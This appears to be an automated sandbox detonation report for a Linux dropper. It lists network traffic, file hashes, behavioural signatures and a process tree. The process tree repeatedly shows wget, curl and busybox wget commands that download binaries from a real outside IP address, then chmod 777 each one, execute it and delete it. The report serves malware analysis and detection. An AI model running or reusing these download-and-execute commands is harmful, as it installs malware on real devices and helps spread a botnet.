[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 151.101.129.91:443 | tcp | |
| GB | 89.187.167.39:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:20
Reported
2024-10-25 01:22
Platform
debian9-armhf-20240611-en
Max time kernel
20s
Max time network
21s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
| N/A | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | N/A |
| N/A | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | N/A |
| N/A | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | N/A |
| N/A | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | N/A |
| N/A | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | N/A |
| N/A | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | N/A |
| N/A | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | N/A |
| N/A | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | N/A |
| N/A | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | N/A |
| N/A | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | N/A |
| N/A | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | N/A |
| N/A | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | N/A |
| N/A | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | /usr/bin/curl | N/A |
Processes
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
[/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/chmod
[chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
[./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/bin/rm
[rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/chmod
[chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
[./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/bin/rm
[rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z]
/usr/bin/wget
[wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/chmod
[chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
[./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/bin/rm
[rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI]
/usr/bin/wget
[wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/chmod
[chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
[./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/bin/rm
[rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0]
/usr/bin/wget
[wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/chmod
[chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
[./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/bin/rm
[rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf]
/usr/bin/wget
[wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/chmod
[chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
[./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/bin/rm
[rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk]
/usr/bin/wget
[wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/chmod
[chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
[./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/bin/rm
[rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh]
/usr/bin/wget
[wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/chmod
[chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
[./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/bin/rm
[rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC]
/usr/bin/wget
[wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/chmod
[chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
[./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/bin/rm
[rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR]
/usr/bin/wget
[wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/chmod
[chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
[./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/bin/rm
[rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx]
/usr/bin/wget
[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/chmod
[chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
[./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/rm
[rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/wget
[wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/chmod
[chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
[./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/bin/rm
[rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959]
/usr/bin/wget
[wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/chmod
[chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
[./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/bin/rm
[rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR]
/usr/bin/wget
[wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/chmod
[chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
[./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/bin/rm
[rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu]
/usr/bin/wget
[wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY]
